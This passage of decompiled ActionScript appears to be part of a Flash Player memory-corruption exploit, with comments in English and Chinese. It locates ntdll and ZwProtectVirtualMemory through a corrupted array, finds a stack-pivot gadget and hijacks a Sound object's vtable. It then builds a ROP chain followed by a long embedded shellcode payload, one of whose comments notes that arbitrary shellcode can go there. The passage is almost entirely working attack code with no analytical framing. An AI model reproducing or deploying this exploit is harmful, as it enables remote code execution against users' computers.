                    _local29 = (_local29 + 1);
                };
                
                // Get Ntdll.dll BaseAddress == _local5
                _local5 = (_local12 & 0xFFFF0000);
                _local29 = 0;
                do 
                {
                    _local29 = (_local29 + 1);
                    if (_local29 > 65536)
                    {
                        return;
                    };
                    try
                    {
                        if ((this.s[_local7][((_local5 - _local21) / 4)] % 65536) == 23117) break;
                        _local5 = (_local5 - 65536);
                    }
                    catch(e:Error)
                    {
                    };
                } while (1);
                
                
                // Get ntdll!ZwProtectVirtualMemory Address  == _local9
                _local25 = _local5;
                _local35 = this.s[_local7][(((_local25 - _local21) + 60) / 4)];
                _local35 = this.s[_local7][((((_local25 - _local21) + _local35) + 120) / 4)];
                _local35 = (_local25 + _local35);
                _local17 = this.s[_local7][(((_local35 - _local21) + 24) / 4)];
                _local36 = (_local25 + this.s[_local7][(((_local35 - _local21) + 28) / 4)]);
                _local3 = (_local25 + this.s[_local7][(((_local35 - _local21) + 32) / 4)]);
                _local31 = (_local25 + this.s[_local7][(((_local35 - _local21) + 36) / 4)]);
                _local29 = 0;
                while (_local29 < (_local17 * 4))
                {
                    _local4 = (_local25 + this.s[_local7][(((_local3 - _local21) + _local29) / 4)]);
                    _local11 = (_local4 % 4);
                    if (_local11 != 0)
                    {
                        if (_local11 != 1)
                        {
                            if (_local11 != 2)
                            {
                                if (_local11 == 3)
                                {
                                    if ((((((((this.s[_local7][(((_local4 + 1) - _local21) / 4)] == 1869762679)) && ((this.s[_local7][((((_local4 + 1) - _local21) / 4) + 1)] == 1952671092)))) && ((this.s[_local7][((((_local4 - _local21) + 1) / 4) + 2)] == 1953655126)))) && ((this.s[_local7][((((_local4 - _local21) + 1) / 4) + 3)] == 1298948469))))
                                    {
                                        if (((_local29 / 2) % 4) != 0)
                                        {
                                            _local31 = (this.s[_local7][((((_local31 - _local21) + (_local29 / 2)) - 2) / 4)] / 65536);
                                        }
                                        else
                                        {
                                            _local31 = (this.s[_local7][(((_local31 - _local21) + (_local29 / 2)) / 4)] % 65536);
                                        };
                                        _local9 = (_local25 + this.s[_local7][(((_local36 - _local21) + (_local31 * 4)) / 4)]);
                                        break;
                                    };
                                };
                            }
                            else
                            {
                                if ((((((((this.s[_local7][(((_local4 + 2) - _local21) / 4)] == 1953460816)) && ((this.s[_local7][((((_local4 + 2) - _local21) / 4) + 1)] == 1450468197)))) && ((this.s[_local7][((((_local4 - _local21) + 2) / 4) + 2)] == 1970565737)))) && ((this.s[_local7][((((_local4 - _local21) + 2) / 4) + 3)] == 1699572833))))
                                {
                                    if (((_local29 / 2) % 4) != 0)
                                    {
                                        _local31 = (this.s[_local7][((((_local31 - _local21) + (_local29 / 2)) - 2) / 4)] / 65536);
                                    }
                                    else
                                    {
                                        _local31 = (this.s[_local7][(((_local31 - _local21) + (_local29 / 2)) / 4)] % 65536);
                                    };
                                    _local9 = (_local25 + this.s[_local7][(((_local36 - _local21) + (_local31 * 4)) / 4)]);
                                    break;
                                };
                            };
                        }
                        else
                        {
                            if ((((((((this.s[_local7][(((_local4 + 3) - _local21) / 4)] == 1702129522)) && ((this.s[_local7][((((_local4 + 3) - _local21) / 4) + 1)] == 1767273571)))) && ((this.s[_local7][((((_local4 - _local21) + 3) / 4) + 2)] == 1635087474)))) && ((this.s[_local7][((((_local4 - _local21) + 3) / 4) + 3)] == 1835355500))))
                            {
                                if (((_local29 / 2) % 4) != 0)
                                {
                                    _local31 = (this.s[_local7][((((_local31 - _local21) + (_local29 / 2)) - 2) / 4)] / 65536);
                                }
                                else
                                {
                                    _local31 = (this.s[_local7][(((_local31 - _local21) + (_local29 / 2)) / 4)] % 65536);
                                };
                                _local9 = (_local25 + this.s[_local7][(((_local36 - _local21) + (_local31 * 4)) / 4)]);
                                break;
                            };
                        };
                    }
                    else
                    {
                        if ((((((((((this.s[_local7][((_local4 - _local21) / 4)] == 1917876058)) && ((this.s[_local7][(((_local4 - _local21) / 4) + 1)] == 1667593327)))) && ((this.s[_local7][(((_local4 - _local21) / 4) + 2)] == 1919506036)))) && ((this.s[_local7][(((_local4 - _local21) / 4) + 3)] == 1818326388)))) && ((this.s[_local7][(((_local4 - _local21) / 4) + 4)] == 1869440333))))
                        {
                            if (((_local29 / 2) % 4) != 0)
                            {
                                _local31 = (this.s[_local7][((((_local31 - _local21) + (_local29 / 2)) - 2) / 4)] / 65536);
                            }
                            else
                            {
                                _local31 = (this.s[_local7][(((_local31 - _local21) + (_local29 / 2)) / 4)] % 65536);
                            };
                            _local9 = (_local25 + this.s[_local7][(((_local36 - _local21) + (_local31 * 4)) / 4)]);
                            break;
                        };
                    };
                    _local29 = (_local29 + 4);
                };
                if (_local9 != 0) break;
            };
            
            // 搜索xchg eax,esp; retn;(0x94C3) Address == _local20
            _local34 = this.s[_local7][(((_local25 - _local21) + 60) / 4)];
            _local23 = this.s[_local7][((((_local25 - _local21) + _local34) + 264) / 4)];
            _local34 = this.s[_local7][((((_local25 - _local21) + _local34) + 260) / 4)];
            _local34 = (_local25 + _local34);
            _local23 = (_local25 + _local23);
            _local29 = _local34;
            while (_local29 < _local23)
            {
                if ((this.s[_local7][((_local29 - _local21) / 4)] & 0xFFFF) != 50068)
                {
                    if ((this.s[_local7][((_local29 - _local21) / 4)] & 0xFFFF00) != 0xC39400)
                    {
                        if ((this.s[_local7][((_local29 - _local21) / 4)] & 0xFFFF0000) != 0xC3940000)
                        {
                            if (((((this.s[_local7][((_local29 - _local21) / 4)] & 0xFF000000) == 0x94000000)) && (((this.s[_local7][(((_local29 - _local21) / 4) + 1)] & 0xFF) == 195))))
                            {
                                _local20 = (_local29 + 3);
                                break;
                            };
                        }
                        else
                        {
                            _local20 = (_local29 + 2);
                            break;
                        };
                    }
                    else
                    {
                        _local20 = (_local29 + 1);
                        break;
                    };
                }
                else
                {
                    _local20 = _local29;
                    break;
                };
                _local29 = (_local29 + 4);
            };
            
            // Get flash.media.Sound Object vftable pointer   _local36 == sound对象虚函数表地址(用于在shellcode中还原对象虚函数表地址)
            _local4 = _local27;        // _local27 == flash.media.Sound对象的引用-1  (即为sound对象的地址)
            if (_local4 > _local21)
            {
                _local36 = this.s[_local7][((_local4 - _local21) / 4)];
            }
            else
            {
                _local36 = this.s[_local7][(0x40000000 + ((_local4 - _local21) / 4))];
            };
            
            
            // Backup the data that will be overwrite.
            _local3 = (_local21 + 248);
            var _local40:uint;
            this.store_bytes.endian = Endian.LITTLE_ENDIAN;
            var _local41:uint = ((((_local3 - _local21) / 4) - 2) - 4);
            while (_local40 < 262144)
            {
                this.store_bytes.writeInt(this.s[_local7][(_local40 + _local41)]);
                _local40++;
            };
            
            // Build ROP chain
            this.s[_local7][((((_local3 - _local21) / 4) - 2) - 4)] = (_local3 & 0xFFFFF000);
            this.s[_local7][((((_local3 - _local21) / 4) - 1) - 4)] = 0x1000;
            this.s[_local7][((_local3 - _local21) / 4)] = _local9;                        // ntdll!ZwProtectVirtualMemory Address
            this.s[_local7][(((_local3 - _local21) / 4) + 1)] = (_local3 + 28);            // ReturnAddress 0x1a1b311c 
            this.s[_local7][(((_local3 - _local21) / 4) + 2)] = 0xFFFFFFFF;
            this.s[_local7][(((_local3 - _local21) / 4) + 3)] = (_local3 - 24);
            this.s[_local7][(((_local3 - _local21) / 4) + 4)] = (_local3 - 20);
            this.s[_local7][(((_local3 - _local21) / 4) + 5)] = 64;
            this.s[_local7][(((_local3 - _local21) / 4) + 6)] = (_local3 - 28);
            this.s[_local7][(((_local3 - _local21) / 4) + 7)] = 538979721;                // Payload start form here.  0x20202D89
            this.s[_local7][(((_local3 - _local21) / 4) + 8)] = 3096451611;                // 0xb8901a1b
            this.s[_local7][(((_local3 - _local21) / 4) + 9)] = _local4;                // _local4 == sound对象的地址
            this.s[_local7][(((_local3 - _local21) / 4) + 10)] = 13078672;
            this.s[_local7][(((_local3 - _local21) / 4) + 11)] = _local36;                // 真正的sound对象虚函数表的地址
            this.s[_local7][(((_local3 - _local21) / 4) + 12)] = 3096481936;            // 0xB8909090
            this.s[_local7][(((_local3 - _local21) / 4) + 13)] = (_local21 - 8);        // 0x1a1b3000 
            this.s[_local7][(((_local3 - _local21) / 4) + 14)] = 13078672;                // 0x00c79090 
            this.s[_local7][(((_local3 - _local21) / 4) + 15)] = 1073741808;
            this.s[_local7][(((_local3 - _local21) / 4) + 16)] = 3968066955;
            this.s[_local7][(((_local3 - _local21) / 4) + 17)] = 0x34eb902c;                // 0x2ceb902c --> 0x34eb902c 
            this.s[_local7][(((_local3 - _local21) / 4) + 18)] = 0xCCCCCCCC;
            this.s[_local7][(((_local3 - _local21) / 4) + 28)] = 0x90909090;                // 伪造虚函数表中的虚函数 xchg eax,esp; retn;   构造的是第0x1C个虚函数,相对伪造的虚函数表的首地址(0x1a1b3100)偏移为0x70
            _local26 = 29;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 0)] = 0x90909090;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 1)] = _local20;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 2)] = 455091384;        // 从此处开始可以为任意shellcode
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 3)] = 2367719706;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 4)] = 2170609757;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 5)] = 262380;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 6)] = 0x89FC8B00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 7)] = 130499679;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 8)] = 210859058;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 9)] = 2382645191;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 10)] = 3349940755;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 11)] = 3795388487;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 12)] = 1204257661;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 13)] = 3515441932;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 14)] = 273139535;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 15)] = 2497983123;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 16)] = 1343506375;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 17)] = 3352009685;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 18)] = 3192068167;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 19)] = 1204280236;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 20)] = 255242780;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 21)] = 541574931;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 22)] = 1948224964;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 23)] = 1361332167;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 24)] = 3338773039;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 25)] = 1716987975;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 26)] = 1204289293;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 27)] = 1688477228;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 28)] = 810010607;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 29)] = 3148865413;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 30)] = 3258206151;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 31)] = 3338750745;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 32)] = 263272519;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 33)] = 1204226027;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 34)] = 357825340;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 35)] = 1078445926;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 36)] = 4161800856;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 37)] = 251881;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 38)] = 0x57895A00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 39)] = 1690317648;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 40)] = 12449;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 41)] = 205556480;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 42)] = 2333360267;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 43)] = 0x8B008B00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 44)] = 1888161896;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 45)] = 684098336;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 46)] = 0x3E80008B;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 47)] = 1946318187;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 48)] = 1262387205;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 49)] = 1179052405;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 50)] = 1969569408;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 51)] = 2147841026;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 52)] = 3681895742;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 53)] = 1048593990;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 54)] = 1946318194;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 55)] = 1379827717;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 56)] = 1179053429;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 57)] = 1970159232;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 58)] = 2147841026;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 59)] = 3749006910;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 60)] = 1465304459;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 61)] = 33614977;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 62)] = 0xF48B0000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 63)] = 3733702795;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 64)] = 4153141387;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 65)] = 3898150762;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 66)] = 799;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 67)] = 4002150882;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 68)] = 842230888;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 69)] = 0x68736800;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 70)] = 2337565797;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 71)] = 41936902;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 72)] = 0xE88B0000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 73)] = 3898147178;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 74)] = 767;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 75)] = 862517730;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 76)] = 0x68000032;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 77)] = 1919251317;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 78)] = 3892742996;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 79)] = 609;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 80)] = 23783563;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 81)] = 48359513;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 82)] = 0xF9E20000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 83)] = 16817805;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 84)] = 0x68530000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 85)] = 0x0100;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 86)] = 2164807423;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 87)] = 1291589756;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 88)] = 1952216943;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 89)] = 3322508546;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 90)] = 39302;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 91)] = 132841728;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 92)] = 10061510;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 93)] = 0x8D000000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 94)] = 131262;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 95)] = 16824576;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 96)] = 0xC0330000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 97)] = 4018252531;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 98)] = 0x0100;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 99)] = 16803927;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 100)] = 0x56FF0000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 101)] = 1086337800;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 102)] = 474240;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 103)] = 2257189237;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 104)] = 144;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 105)] = 33603213;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 106)] = 0xDF8B0000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 107)] = 9471627;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 108)] = 0xF8030000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 109)] = 1903364039;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 110)] = 1204253292;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 111)] = 1701733636;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 112)] = 138921847;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 113)] = 1954051118;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 114)] = 0x6A006A;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 115)] = 6947434;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 116)] = 6816362;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 117)] = 0x53400000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 118)] = 3893380747;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 119)] = 449;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 120)] = 0xFFFFFF3D;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 121)] = 2844004111;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 122)] = 0x89000001;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 123)] = 39046;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 124)] = 0xEC8100;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 125)] = 0x8B000004;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 126)] = 15499772;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 127)] = 0x33000001;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 128)] = 1350470619;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 129)] = 2298988419;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 130)] = 1187467390;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 131)] = 262256;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 132)] = 0x831F8B00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 133)] = 3375566023;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 134)] = 2088815499;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 135)] = 1955987215;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 136)] = 259817484;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 137)] = 91488511;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 138)] = 4279202944;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 139)] = 2347491989;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 140)] = 1602965630;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 141)] = 214401796;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 142)] = 67173249;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 143)] = 58654720;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 144)] = 1785749129;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 145)] = 0x74468D00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 146)] = 1886846800;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 147)] = 2562129751;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 148)] = 0xFF000000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 149)] = 3347128406;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 150)] = 0x0400;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 151)] = 67169153;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 152)] = 0xFB830000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 153)] = 0x81D17F00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 154)] = 327876;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 155)] = 0x98868B00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 156)] = 0x50000000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 157)] = 3894953611;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 158)] = 293;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 159)] = 12488080;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 160)] = 0x8B000002;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 161)] = 2424736735;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 162)] = 50331648;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 163)] = 1929889784;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 164)] = 3345314420;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 165)] = 1835074631;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 166)] = 1204249902;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 167)] = 6649864;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 168)] = 0x6A9000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 169)] = 40501354;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 170)] = 40501354;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 171)] = 104;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 172)] = 1183535936;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 173)] = 15198224;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 174)] = 0xFF3D0000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 175)] = 252706815;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 176)] = 53124;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 177)] = 0x98868900;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 178)] = 0x81000000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 179)] = 262380;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 180)] = 0x81FC8B00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 181)] = 65772;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 182)] = 0x8BDB3300;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 183)] = 1187467390;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 184)] = 262256;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 185)] = 71797504;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 186)] = 2198364043;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 187)] = 4160949447;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 188)] = 67173249;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 189)] = 58654720;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 190)] = 1785749129;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 191)] = 0x74468D00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 192)] = 1886846800;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 193)] = 2562129751;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 194)] = 0xFF000000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 195)] = 3347128406;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 196)] = 0x0400;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 197)] = 67169153;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 198)] = 0xFB830000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 199)] = 0x81D17F00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 200)] = 327876;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 201)] = 0x98868B00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 202)] = 0x50000000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 203)] = 3894953611;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 204)] = 109;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 205)] = 12488080;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 206)] = 0x8B000002;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 207)] = 2424736735;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 208)] = 50331648;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 209)] = 1929889784;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 210)] = 3346164849;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 211)] = 1852113991;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 212)] = 1204254565;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 213)] = 2020879880;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 214)] = 2333207412;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 215)] = 6956092;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 216)] = 33595021;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 217)] = 0x8B530000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 218)] = 904615686;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 219)] = 0xFFFFEAE8;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 220)] = 1461840895;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 221)] = 136608907;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 222)] = 0x6A006A51;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 223)] = 0x6A036A00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 224)] = 0x68016A00;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 225)] = 0x80000000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 226)] = 273058647;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 227)] = 4328;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 228)] = 0xC35F5900;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 229)] = 455091384;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 230)] = 2199948058;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 231)] = 680199400;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 232)] = 3896017091;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 233)] = 947915380;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 234)] = 2147841257;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 235)] = 292940600;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 236)] = 2416277633;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 237)] = 1955631248;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 238)] = 1442810632;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 239)] = 1083042955;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 240)] = 3907059461;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 241)] = 63;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 242)] = 3896017091;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 243)] = 947915380;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 244)] = 2147841257;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 245)] = 292940600;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 246)] = 2416277633;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 247)] = 1955631248;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 248)] = 168323296;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 249)] = 0x408D0000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 250)] = 3907059461;
